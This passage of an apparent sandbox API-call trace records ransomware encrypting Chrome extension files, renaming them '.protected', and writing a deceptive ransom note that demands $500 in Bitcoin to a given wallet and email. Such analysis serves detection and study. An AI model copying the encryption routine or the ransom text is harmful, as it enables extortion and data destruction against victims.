lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.880] CloseHandle (hObject=0x168) returned 1 [0079.880] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.protected") returned 167 [0079.881] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\messages.json.protected")) returned 1 [0079.881] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.881] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.881] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\RESTORE_FILES.txt") returned 161 [0079.881] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sr\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.882] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.882] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.883] lstrlenA (lpString="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") returned 684 [0079.883] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.883] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.883] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.883] CloseHandle (hObject=0x164) returned 1 [0079.883] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.883] lstrcmpiW (lpString1="sv", lpString2="Windows") returned -1 [0079.883] lstrcmpiW (lpString1="sv", lpString2="Program Files") returned 1 [0079.883] lstrcmpiW (lpString1="sv", lpString2="Program Files (x86)") returned 1 [0079.883] lstrcmpiW (lpString1="sv", lpString2="$Recycle.bin") returned 1 [0079.884] lstrcmpiW (lpString1="sv", lpString2="System Volume Information") returned -1 [0079.884] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv") returned 143 [0079.884] lstrcmpW (lpString1="sv", lpString2=".") returned 1 [0079.884] lstrcmpW (lpString1="sv", lpString2="..") returned 1 [0079.884] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\*") returned 145 [0079.884] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0079.884] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.884] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.884] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.884] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.884] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.884] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\.") returned 145 [0079.884] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.884] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.884] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.884] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.884] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.884] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.884] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.884] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\..") returned 146 [0079.884] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.884] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.884] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.885] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.885] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.885] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.885] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.885] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.885] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json") returned 157 [0079.885] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.885] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.885] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.885] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.885] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.885] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json") returned 157 [0079.885] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.885] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json") returned 157 [0079.885] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.885] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json") returned 157 [0079.885] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.885] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.887] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.887] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.887] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.887] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.887] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.887] CloseHandle (hObject=0x168) returned 1 [0079.887] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.protected") returned 167 [0079.887] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\messages.json.protected")) returned 1 [0079.888] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.888] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.888] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\RESTORE_FILES.txt") returned 161 [0079.888] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\sv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.888] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.888] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.889] lstrlenA (lpString="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") returned 684 [0079.889] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.890] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.890] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.890] CloseHandle (hObject=0x164) returned 1 [0079.890] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.890] lstrcmpiW (lpString1="th", lpString2="Windows") returned -1 [0079.890] lstrcmpiW (lpString1="th", lpString2="Program Files") returned 1 [0079.890] lstrcmpiW (lpString1="th", lpString2="Program Files (x86)") returned 1 [0079.890] lstrcmpiW (lpString1="th", lpString2="$Recycle.bin") returned 1 [0079.890] lstrcmpiW (lpString1="th", lpString2="System Volume Information") returned 1 [0079.890] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th") returned 143 [0079.890] lstrcmpW (lpString1="th", lpString2=".") returned 1 [0079.890] lstrcmpW (lpString1="th", lpString2="..") returned 1 [0079.890] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\*") returned 145 [0079.890] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0079.891] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.891] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.891] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.891] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.891] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.891] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\.") returned 145 [0079.891] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.891] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.891] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.891] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.891] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.891] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.891] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.891] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\..") returned 146 [0079.891] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.891] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.891] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.891] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.891] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.892] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.892] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.892] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.892] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json") returned 157 [0079.892] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.892] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.892] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.892] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.892] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json") returned 157 [0079.892] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.892] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json") returned 157 [0079.892] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.892] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json") returned 157 [0079.892] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.892] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.893] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.893] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.893] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.894] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.894] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.894] CloseHandle (hObject=0x168) returned 1 [0079.894] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.protected") returned 167 [0079.894] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\messages.json.protected")) returned 1 [0079.895] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.895] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.895] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\RESTORE_FILES.txt") returned 161 [0079.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\th\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 